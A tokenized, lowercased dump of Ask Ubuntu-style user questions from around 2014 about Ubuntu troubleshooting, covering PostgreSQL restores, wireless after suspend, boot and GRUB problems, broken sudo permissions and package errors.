452825	why does running this restore command take so long ?	i 'm using postgresql 9.1 on ubuntu 12.04 . the development machine has 2gb ram and it 's a centrino duo . the backup command is pg_dump and takes less than 5 seconds to run from the terminal . but my restore is done like this : /usr/bin/psql -- host localhost -- port 5432 -- username `` postgres '' -- quiet `` dbhrs '' < `` t2 '' the text file `` t2 '' has around 5000 lines of inserts . but it takes around 2 minutes to complete . why does it take this long ? is there something i can do to make it faster ? additional info : the backup was done like this : /usr/bin/pg_dump -- host localhost -- port 5432 -- username `` postgres '' -- role `` mizk '' -- no-password -- format plain -- data-only -- inserts -- column-inserts -- verbose -- file `` abc '' `` dbhrs '' so the file abc contains just a set of insert queries . that 's all . no stored procs , no triggers ... i can not accept the slowness to restore . what 's strange is that when i copy-paste the text file 's contents into a query window on pg-admin , it 's pretty fast . just a couple of seconds . so i think it 's got to do with the way the psql command works . maybe i 'm wrong .
452826	wireless networking not working after resume in ubuntu 14.04	[ update ] : the same problem exists in kubuntu and is solved in the same manner . [ solved ] : by applying the following command nmcli nm i got the following : before suspend running state wifi-hardware wifi wwan-hardware wwan running connected enabled enabled enabled enabled as can you see the state is connected and the rest are enabled and running after suspend running state wifi-hardware wifi wwan-hardware wwan running asleep enabled enabled enabled disabled as can you see the state is asleep meaning our dear network manager is still napping , so to solve use the fallowing command line : sudo nmcli nm sleep false this tells the network manager to wake the hell up . to make this permenant : create a script in /etc/pm/sleep.d containg the following ( and do n't forget to mark the script as executable ) : # ! /bin/sh case `` $ { 1 } '' in resume|thaw ) nmcli nm sleep false ; ; esac thanks to this the original problem : i just downloaded ubuntu 14.04 and installed on my laptop : asus x61sl with intel p8400 core2duo x64 processor . when i close the lid , the system is suspended , but when i open the lid again and resume , the wireless networking is not activited ( networking as a whole is disabled ) , and when i select `` enable networking '' nothing happens . this is the information about my wireless adapter : $ lspci | grep -i wireless 02:00.0 network controller : qualcomm atheros ar928x wireless network adapter ( pci-express ) ( rev 01 ) this problem was n't present in ubuntu 13.04 , linux mint debian edition or debian 7 wheezy ( gnome or kde ) . edit : few test with the following results : the problem effects my wireless and wired networking . note : i need to add the pci=nomsi line to grub in order to boot . when logging out manually then suspend then resume then log in every thing works just fine . when suspending directly while logged in the problem happens . locking and suspending causes the same problem as suspending directly . also this problem appearnlty affects log out function : if you chose log out from the user menu in unity panel then you wa n't log out , but if you use the command line gnome-session-quit -- logout then you can log out . now with lshw -c network output : normal ( fully functional networking ) : *-network description : ethernet interface product : 191 gigabit ethernet adapter vendor : silicon integrated systems [ sis ] physical id : 4 bus info : pci @ 0000:00:04.0 logical name : eth0 version : 02 serial : 00:24:8c:1e : f8:53 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sis190 driverversion=1.4 duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:19 memory : fddfcc00-fddfcc7f ioport : cc00 ( size=128 ) *-network description : wireless interface product : ar928x wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:15 : af : e2:13 : db width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a ip=6.6.6.8 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : fdff0000-fdffffff after resume ( `` /etc/pm/config.d '' does not contains `` unload_modules '' ) : *-network disabled description : ethernet interface product : 191 gigabit ethernet adapter vendor : silicon integrated systems [ sis ] physical id : 4 bus info : pci @ 0000:00:04.0 logical name : eth0 version : 02 serial : 00:24:8c:1e : f8:53 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sis190 driverversion=1.4 duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:19 memory : fddfcc00-fddfcc7f ioport : cc00 ( size=128 ) *-network disabled description : wireless interface product : ar928x wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:15 : af : e2:13 : db width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : fdff0000-fdffffff when i added the file unload_modules to directory `` /etc/pm/config.d '' as suggested by here , after logging out , suspend , resume then log in the networking works but i can not connect to my wireless network . again the result of lshw -c network after resume ( `` /etc/pm/config.d '' contains `` unload_modules '' ) : *-network disabled description : ethernet interface product : 191 gigabit ethernet adapter vendor : silicon integrated systems [ sis ] physical id : 4 bus info : pci @ 0000:00:04.0 logical name : eth0 version : 02 serial : 00:24:8c:1e : f8:53 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sis190 driverversion=1.4 duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:19 memory : fddfcc00-fddfcc7f ioport : cc00 ( size=128 ) *-network disabled description : wireless interface product : ar928x wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:15 : af : e2:13 : db width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : fdff0000-fdffffff the contents of 'unload_modules '' where : suspend_modules= '' $ suspend_modules ath9k '' suspend_modules= '' $ suspend_modules sis190 '' where 'ath9k ' is my wireless module and 'sis190 ' is my ethernet module .
452827	wifi not working on 14.04 notebook	i have this acer aspire v5 notebook , which had problems with wifi before in 13.10 and i had to use the ethernet . sometimes it randomly started working but most of the time it would n't . so then i updated and wifi still does n't work , no matter what i try . i tried unplugging the cable , replugging it while connecting to wifi and some other combos but it just does n't connect . it shows that blank wifi symbol everytime . : ( please i 'm looking for help anything appreciated . oh btw ethernet cable works fine : / but it 's annoying to switch it between my desktop and laptop everyime : p
452828	can i use ubuntu for clojure development	i want to learn clojure and i want to use intellij and the cursive plugin . can i easily install all of these ? roelof
452835	problem while dual booting windows 8 pro with ubuntu 13.10	i have a hp pavilion-15-n004tx laptop . it supports uefi . however when i installed windows 8 on it , i disabled the uefi and installed the windows in legacy bios mode . i wanted to dual boot it with ubuntu 13.10 . i read the instructions from this link . now when i tried the live usb then in 'try ubuntu without installing ' mode , i got the error saying that 'your system is running in low graphics ' . i tried troubleshooting the problem after reading many questions from this site . they implied that i had to first install the ubuntu and then open it in recovery mode . so when i tried installing ubuntu , everything worked fine and ubuntu 13.10 was successfully installed on my system but when i rebooted the computer then i did n't get any grub menu and windows 8 started automatically . so i made live usb of boot-repair and ran it . but it did n't solve the problem as instead of grub menu , windows 8 started automatically like before . how can i get the grub menu to select between windows and ubuntu . i am attaching the boot-info summary given by boot-repair . additionally i am uploading the result of 'msinfo32 ' command in windows . i am also uploading the screen obtained while installation of ubuntu at 'something else ' . i would be really obliged to anyone who can help me solve this problem . thanks in advance . ps : i am unable to attach photos so i am providing the links . thanks ! the link for boot info summary is : boot info log
452837	several applications give `` libtasn1.so.3 : can not open shared object file : no such file or directory ''	i get this error when i try running libreoffice after upgrading from 13.10 to 14.04 . ~ $ > libreoffice -- writer /usr/lib/libreoffice/program/soffice.bin : error while loading shared libraries : libtasn1.so.3 : can not open shared object file : no such file or directory this problem relate to more programs than just libreoffice . /usr/lib/chromium-browser/chromium-browser : error while loading shared libraries : libtasn1.so.3 : can not open shared object file : no such file or directory output of strace ~ $ > strace filezilla ... access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/tls/x86_64/libtasn1.so.3 '' , o_rdonly|o_cloexec ) = -1 enoent ( no such file or directory ) stat ( `` /lib/x86_64-linux-gnu/tls/x86_64 '' , 0x7fffc19f9310 ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/tls/libtasn1.so.3 '' , o_rdonly|o_cloexec ) = -1 enoent ( no such file or directory ) stat ( `` /lib/x86_64-linux-gnu/tls '' , 0x7fffc19f9310 ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/x86_64/libtasn1.so.3 '' , o_rdonly|o_cloexec ) = -1 enoent ( no such file or directory ) stat ( `` /lib/x86_64-linux-gnu/x86_64 '' , 0x7fffc19f9310 ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libtasn1.so.3 '' , o_rdonly|o_cloexec ) = -1 enoent ( no such file or directory ) stat ( `` /lib/x86_64-linux-gnu '' , { st_mode=s_ifdir|0755 , st_size=16384 , ... } ) = 0 ... writev ( 2 , [ { `` filezilla '' , 9 } , { `` : `` , 2 } , { `` error while loading shared libra '' ... , 36 } , { `` : `` , 2 } , { `` libtasn1.so.3 '' , 13 } , { `` : `` , 2 } , { `` can not open shared object file '' , 30 } , { `` : `` , 2 } , { `` no such file or directory '' , 25 } , { `` \n '' , 1 } ] , 10filezilla : error while loading shared libraries : libtasn1.so.3 : can not open shared object file : no such file or directory ) = 122 exit_group ( 127 )
452838	how to restore deleted php files using scalpel	i upgraded 13.10 to 14.04 . after the upgrade finished , unfortunately found out that /var/www/ folder has been deleted ( i did n't know that upgrade does the same as fresh install ! ! ! ) . i have searched a full 24 hours for finding a solution but still have no chance . just scalpel had been the only tool which restored some parts of my files ( sorry for lack of recovery tools in linux ) . i have added this pattern : php n 50000 < ? php ? > in /etc/scalpel/scalpel.conf but now the problem is that there are more than one < ? php and ? > in my php files , so scalpel divides them into so many files which are not recognizable . is there a better header and footer for php files to use in scalpel and get the more precise result ?
452840	software center crashing	any time i try to run the ubuntu software center it immediately crashes . i go to terminal and type in 'software-center ' and this is the results i get . any help . 2014-04-22 09:29:28,526 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-04-22 09:29:28,987 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-04-22 09:29:28,990 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-04-22 09:29:28,994 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-04-22 09:29:28,994 - root - error - could not find any typelib for launchpadintegration 2014-04-22 09:29:29,035 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2014-04-22 09:29:29,604 - softwarecenter.backend.reviews - warning - error creating bsddb : ' ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) ' ( corrupted ? ) 2014-04-22 09:29:29,605 - softwarecenter.backend.reviews - error - trying to repair db failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 358 , in _save_review_stats_cache_blocking self._dump_bsddbm_for_unity ( outfile , outdir ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 377 , in _dump_bsddbm_for_unity 0600 ) dbinvalidargerror : ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) /usr/lib/python2.7/dist-packages/gi/overrides/glib.py:535 : warning : source id 68 was not found when attempting to remove it return super ( maincontext , self ) .iteration ( may_block ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 155 , in open self._list.read_main_list ( ) systemerror : e : type 'sudo ' is not known on line 57 in source list /etc/apt/sources.list 2014-04-22 09:29:30,054 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1375 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1313 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 227 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 326 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 121 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 255 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
452841	why does ubuntu 12.04 boot to black screen after updating chromium ?	i was running ubuntu 12.04 lts for 64 bit systems on a dual boot custom computer with windows 7 . it was functioning normally for at least 3 days before i noticed that youtube videos were flickering on my screen in chromium . my first thought was to update flash , and since flash comes with the latest version of chrome , i tried updating my chromium installation . at first i tried using the chromium updater extension , but it did n't solve the problem . it was somewhere around this time that chromium stopped opening completely . i then tried uninstalling and reinstalling chromium , but it still would n't open . i tried running the program from the command line , but got a message involving `` libudev.so.0 '' being missing from the operating system . i believe after this i had to leave so i shut down the computer . the next day , i tried loading the ubuntu installation , only to see that it was stuck on the purple screen . after waiting a while , i tried restarting it and loading it again . this time , it only booted to a black screen with a blinking line at the top left of the screen , much like a terminal window . i tried removing all the non essential usb devices but it still would n't boot . i did attempt to use the boot-repair graphical tool , but it said that it encoutered an error and gave me this link : http : //paste.ubuntu.com/7306456/ . ubuntu still wo n't boot at this point , and i 'd rather not have to reinstall it a third time . i did try repairing grub2 via the live cd terminal as accoridng to this page : https : //help.ubuntu.com/community/grub2/installing # via_the_livecd_terminal , but i 'm a bit nervous about removing the grub entirely . wo n't that make it difficult for me to boot windows ? also , i ca n't remember exactly when but i got that same message about libudev.so.0 being missing again at some point when trying to boot . probably after using boot-repair . april 23 - i did try enabling boot messages to see if anything useful came up , and i got two messages at the very end that looked important . ureadahead main process ( 312 ) terminated with status 5 mountall main process ( 319 ) terminated with status 127 i did try looking up solutions , but the ones i found sounded very sketchy and all over the place .
452844	how to automate chmod	how do i make the default value when upload a file via ftp for it to be 777 . like a have a ubuntu server , and one of the users has an application that created files in his folder , how do i make the values for that created/upload file to be by default 777 ?
452845	blank desktop after upgrade to 14.04	last night a window popped up on my version 13.10 desktop asking if i want to upgrade to 14.04 . i said yes , since you should keep software up to date and such . the install went smoothly , but now it boots fine , gives me the user list , and boots to a blank desktop no matter what user i select . there is no response to left or right clicking . pressing < ctrl > < alt > < f1 > gives me a prompt : ubuntu 14.04 lts media tty1 media login : there are a bunch of entries that talk about using < ctrl > < alt > < f1 > to get a terminal prompt . i can not get to a prompt . < ctrl > < alt > < t > does nothing . i really do not want to go to the trouble of re-copying all my media files , and re-installing and re-configuring plex . is there any way to fix this ? if not , is there a way to revert to 13.10 or re-install 14.04 without destroying all my data and configuration ?
452847	how do i fetch from another mirror ?	i 've come around some broken repositories . how do i change the mirror for this apt-get only ? ? i am using ubuntu server 12.04. alex @ **** : ~ $ sudo apt-get install exfat-fuse exfat-utils [ sudo ] password for alex : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : exfat-fuse exfat-utils 0 upgraded , 2 newly installed , 0 to remove and 2 not upgraded . need to get 130 kb of archives . after this operation , 329 kb of additional disk space will be used . err http : //pl.archive.ubuntu.com/ubuntu/ precise-backports/universe exfat-fuse i386 1.0.1-1~ubuntu12.04.1 temporary failure resolving 'pl.archive.ubuntu.com' err http : //pl.archive.ubuntu.com/ubuntu/ precise-backports/universe exfat-utils i386 1.0.1-1~ubuntu12.04.1 temporary failure resolving 'pl.archive.ubuntu.com' failed to fetch http : //pl.archive.ubuntu.com/ubuntu/pool/universe/f/fuse-exfat/exfat-fuse_1.0.1-1~ubuntu12.04.1_i386.deb temporary failure resolving 'pl.archive.ubuntu.com' failed to fetch http : //pl.archive.ubuntu.com/ubuntu/pool/universe/e/exfat-utils/exfat-utils_1.0.1-1~ubuntu12.04.1_i386.deb temporary failure resolving 'pl.archive.ubuntu.com' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? alex @ **** : ~ $ su password : root @ **** : /home/alex # sudo mount -t exfat /dev/sdb /mnt/extdisk/ mount : unknown filesystem type 'exfat'
452851	ctrl+a does n't return all the way back in terminal	i recently updated my prompt to look something like [ user @ user ] ~/wroking/directory ( git-branch ) ↳ using the following code in my .bashrc source ~/.local/bin/git-prompt.sh git_ps1_showdirtystate= '' true '' ps1='\e [ 0 ; 36m [ $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h ] \w $ ( __git_ps1 `` ( % s ) '' ) \e [ m\n\e [ 1 ; 36m⤷\e [ m ' however when i ctrl+a back to the start of input , the cursor ( █ ) only moves like so [ user @ user ] ~/wroking/directory ( git-branch ) ↳ command -- option1=foo -- option2=bar█ ctrl+a [ user @ user ] ~/wroking/directory ( git-branch ) ↳ command -█option1=foo -- option2=bar ctrl+k [ user @ user ] ~/wroking/directory ( git-branch ) ↳ command -█ ctrl+e [ user @ user ] ~/wroking/directory ( git-branch ) ↳ command - █ if i press back-space after ctrl-a nothing happens . nor if i press left-arrow . i can always fix this by clearing the screen , however i find this behaviour really annoying and distracting . especially since i do n't know what is going on . does anybody know ? how do i fix this ?
452854	ubuntu get stuck on restart or any other event , force switch off leads to a broken boot loader	i have ubuntu 12.04 installed in lenovo thnkpad s540 . nce in a while ( 3 times for the last week ) , ubuntu got stuck when i restart or even when im working ( pulled out extended monitor ) . then when i use the power button to shut the computer and start it back it takes me to grub . then i need to use boot fix usb and fix the whole thing . any idea what is causing ubuntu to break the boot loader so easily . what am i missing ? ?
452855	microsoft wireless laser mouse 8000 horizontal scroll	i have the microsoft wireless laser mouse 8000 on xubuntu 14.04 and am trying to get the horizontal scrolling to work . vertical scrolling works perfectly . the horizontal scroll is usually ( on windows ) triggered by pushing the wheel to the left or right . i checked with xev and xinput , the horizontal and the vertical scroll seem to emit the same mouse buttons . scrolling up is reported to be button 4 , so is scrolling to the right . button 5 is reported when scrolling down of to the left . now i know for sure on some old opensuse 11.x the scrolling in both directions was working , and it does on windows so there has to be away . i already read through the manymousehowto at https : //help.ubuntu.com/community/manybuttonsmousehowto but the suggested remapping of buttons is n't successfull as long as the buttons report the same button id . here is the output from xinput : âł microsoft microsoftâž wireless laser mouse 8000 id=10 [ slave pointer ( 2 ) ] reporting 9 classes : class originated from : 10 . type : xibuttonclass buttons supported : 13 button labels : `` button left '' `` button middle '' `` button right '' `` button wheel up '' `` button wheel down '' `` button horiz wheel left '' `` button horiz wheel right '' `` button side '' `` button extra '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' button state : class originated from : 10 . type : xivaluatorclass detail for valuator 0 : label : rel x range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 1 : label : rel y range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 2 : label : rel horiz wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 3 : label : rel dial range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 4 : label : rel vert wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xiscrollclass scroll info for valuator 2 type : 2 ( horizontal ) increment : 1.000000 flags : 0x0 class originated from : 10 . type : xiscrollclass scroll info for valuator 3 type : 1 ( vertical ) increment : -1.000000 flags : 0x0 class originated from : 10 . type : xiscrollclass scroll info for valuator 4 type : 1 ( vertical ) increment : -1.000000 flags : 0x2 ( preferred ) this is the output of xev that is the same for scrolling up and scrolling to the right : buttonpress event , serial 37 , synthetic no , window 0x4400001 , root 0x288 , subw 0x0 , time 35409070 , ( 161,2 ) , root : ( 1032,477 ) , state 0x10 , button 4 , same_screen yes
452856	how do i add an `` all applications '' folder to kickoff launcher in kde	i have zorin os ( basically a skinned version of ubuntu ) but i installed kde because it really has a much larger user base as a desktop environment and has a much wider range of features . my only real complaint is that i really want a start menu that almost perfectly mimics that of windows 7 , i want an all programs folder , and a search bar , along with favorites and system tasks and places along the side , i want a cross between the zorin menu , and kickoff , and it has to be a plasma applet or there has to be a way for me to integrate it with a kde based taskbar . the reason i got zorin is because i personally do not have a taste for unity or gnome 3.x . i really like linux , but i 've used winndows since windows 98 , and have used every version since , except for windows 8 which i do not intend to get , kde seems to offer an experience that is as close as i can get , functionality wise , to windows .
452858	does lenovo ideapad series support ubuntu y510/z510/u510	i am going to buy a new laptop and i need it with nvidia graphics card .. i searched and i found lenovo ideapad series z/y/u 510 have my suitable hardware specs but i can not find any resources about supporting any of them to ubuntu and the official site of lenovo does n't have any support for lenovo . my question is : does any of those three laptops ( y510 , z510 , u510 ) support ubunut ? if no . what laptop with gforce gpu do you recommend to me ? if yes where to find a guide to install it along side windows ? thanks in advance
452860	/usr/bin/sudo must be owned by uid 0 and have the setuid bit set	i have run following command accidentally sudo chown [ username ] -hr / now sudo su getting error : sudo : /usr/bin/sudo must be owned by uid 0 and have the setuid bit set how to solve this ?
452862	`build-dep` download location ?	i downloaded build dependency of nautilus with sudo apt-get build-dep nautilus now ; where can i find its .h and .cpp files ?
452864	how to get gnome shell 3.12 on ubuntu 14.04	i know there is a distro for ubuntu dedicated to gnome and i know ubuntu 14.04 comes with gnome 3.10 . but i am wondering what the steps are to : install the ppas for gnome 3.12 install gnome 3.12 only use gnome 3.12 ( with no option for unity ) note : other answers in the similar category show getting the supported version by ubuntu , the `` already packaged version '' how ever there are steps to get 3.12 , which doesnt come with ubuntu 14.04 and requires ppa installation . those steps are the steps i am looking for , not `` open the software centre and download gnome '' because that 3.10
452865	starting ubuntu after first installation	i have just installed ubuntu on a laptop . i am trying to set up the wifi but i am asked to supply a `` root '' password to get supervisor access . when downloading i set up a username and password . searching the net i am pointed to `` sudo '' and `` gksudo '' to try to get administrative priviledges . i find out how to get these but trying to get them i find i need administrative privileges . thus i am going round in a circle . i ca n't find anything ( yet ) that can point me in the right direction . can somebody help , please ?
452866	how to block the specific websites using proxy server ?	i need to block the social networking sites like facebook , twitter , etc within my office network . i tried some proxy server and enabled settings in browser like giving ip and port number . it works but any one can disable the settings easily in the browser , and have easy access . how do i setup a proxy server to prevent non-administrative users to access these sites ?
452871	how to get ssh login address on linux terminal while working on many tabs	this will be very helpfull while working on multiple ssh session at a time
452874	upgrading ubuntu 13.10 to ubuntu 14.04	can someone please tell me how to upgrade ubuntu 13.10 to ubuntu 14.04 ... it gives an error that `` third party sources are disabled '' .. i do n't know how to enable them .
452875	my bose soundlink is n't discoverable on ubuntu 14.04	bluetooth is working , but it wo n't recongize the soundlink when i turn it on . any ideas ?
452876	does ubuntu server support pnfs yet ?	i am currently implimenting a new storage infrastructure and the hardware supports pnfs as part of nfs4.1 . is there a supported pnfs implimentation in ubuntu server ? if so , can someone please provide documentation ?
452881	running app from the sdk to a nexus 4 phone produces ssh_exchange_identification : connection closed by remote host error	i have before successfully run apps on this device from the sdk . now the sdk is giving me an error : [ 10:27:08 ] started /usr/share/qtcreator/ubuntu/scripts/qtc_device_run_app [ 10:27:09 ] ssh_exchange_identification : connection closed by remote host [ 10:27:09 ] /usr/share/qtcreator/ubuntu/scripts/qtc_device_run_app finished with code 255 i have bootstrapped the latest devel-proposed ( 302 ) and i 've tried the command : adb shell setprop persist.service.ssh true & & adb reboot with no luck . the device works just fine , and i can ssh into from command line no problem , it 's only an issue with running an app from the sdk to the device . the device is also detected by the sdk and running in developer mode in the sdk . anyone seen this error before or have any idea how to fix it ? thanks
452885	can not boot from ubuntu 14.04 live usb	i recently downloaded and created ubuntu 14.04 32 bit using unebootin . the process was successful , but after reboot the screen is stuck with syslinux screen forever . i tried numerous times , but everything ended in vain . any help folks ! ! .
452886	timeout for launchpad in both web and apt	i 'm not getting errors with any other service , it only seems to be the ssl encrypted version of *.launchpad.net that is timing out . i do n't have any proxies set up ( i just checked again ) , and it has been going on for about 24 hours now . i 've checked with `` is it down '' services and some say it 's up and some do n't . how can i confirm if anything on my end is causing the issue ? i 'm on 12.04 lts ( elementary )
452892	starting services with custom xsession	i 'm new to ubuntu . i 've accomplished making chromium start at boot with xsessionrc file , but now i want to get a screenshot of the desktop every minute ( which is just chromium basically ) . i 've disabled the xsessionrc scripts , logged in , added job to crontab with screenshot.sh script which runs scrot with path to dropbox . it is working fine , but when i roll back the changes in xsessionrc - making it boot directly to chromium it seems like cron is n't working . screenshots are n't being made . is this caused by running only chromium-browser in xsessionrc file ? when i delete xsessionrc screenshots are being captured , but i want the desktop to be restricted just to browser , because i want this setup to act like infokiosk at the shopping mall . do you have any ideas ?
452893	ubuntu on a hp pavilion dv6-3315	i think this is not a duplicate thread . if it is sorry . i have a hp pavilion dv6-3315 , wich has an intel i5-450m , 4gb of ram , an ati hd6550m ( that some programs and ubuntu recognize as an ati hd5650m , http : //puu.sh/6hyxj.jpg ) and an intel hd3000 integrated graphic card . my problem is that i ca n't make ubuntu to work with these 2 graphics cards . sometime ago i was able to use switchroo to at least disable the ati . problem with this is that the laptop starts to make too much noise and heat , and i ca n't also use my vga and hdmi ports properly . i already tried several things and i end up with a black screen having only access to the terminal ( via ctrl+alt+f1 ) . please , if you have some solution for these say . even if the solution is to turn off the ati ( btw , i ca n't turn off any of the 2 cards on bios ) . thank you . ; )
452898	authentication failure on upgrade to 14.04	i was in the middle of upgrading from 12.04 to 14.04 when my internet service went down . the upgrade aborted . on switching to another network and trying sudo do-release-upgrade -d , i get the following output and error : checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1,148 kb ] fetched 1,148 kb in 0s ( 0 b/s ) authenticate 'trusty.tar.gz ' against 'trusty.tar.gz.gpg ' exception from gpg : gnupg exited non-zero , with code 1 debug information : gpg : signature made sat 12 apr 2014 11:55:14 pm eat using dsa key id ******** gpg : /tmp/update-manager-qyunc1/trustdb.gpg : trustdb created gpg : bad signature from `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . what is causing this and how can i fix it ?
452900	java plugins are not detected after upgrading	after an upgrade to trusty tahr ( 14.04 ) , it seems java has ceased to work in several browsers ( tested on firefox , chromium , and chrome ) . ubuntu-restricted-extras is installed , oracle-java was installed using the webupd8 ppa , and i also tried applying a fix to an update-alternatives error , and installing icedtea , to no avail . how to activate java plugins in the browsers ?
452904	likewise-open | 14.04 | other easy way to connect ad ?	we use a lot of linux-servers with active-directory membership for user-authentication . this are made with the likewise-open packet . we tested the beta-version of ubuntu server 14.04 lts . everything works fine after one minute ( install , domain-join , import registry , edit sudoers , done ) . now , from beta to production-release likewise-open is removed from repository . is there any equivalent easy way for ad-domain-join and ( ad- ) group-based login-management ( without manually installing and editing config-files for samba , winbind , nsswitch , pam etc ... . ? thanks a lot silvio
452905	how to measure download speed	what is a good simple easily installable app to measure download speed on ubuntu 14.04 ?
452906	application switcher - disable select on mouse over	since my upgrade to 13.10 , the icons in the application switcher react to a simple mouse hover . i find this setting annoying . i was used to using only the keyboard , and i now regularly find myself selecting the wrong window when [ alt+tab ] -ing through the list because of a slight mouse move . is there a place where i could set `` keyboard only '' , or `` keyboard + click only '' , for selecting a window the the application switcher ?
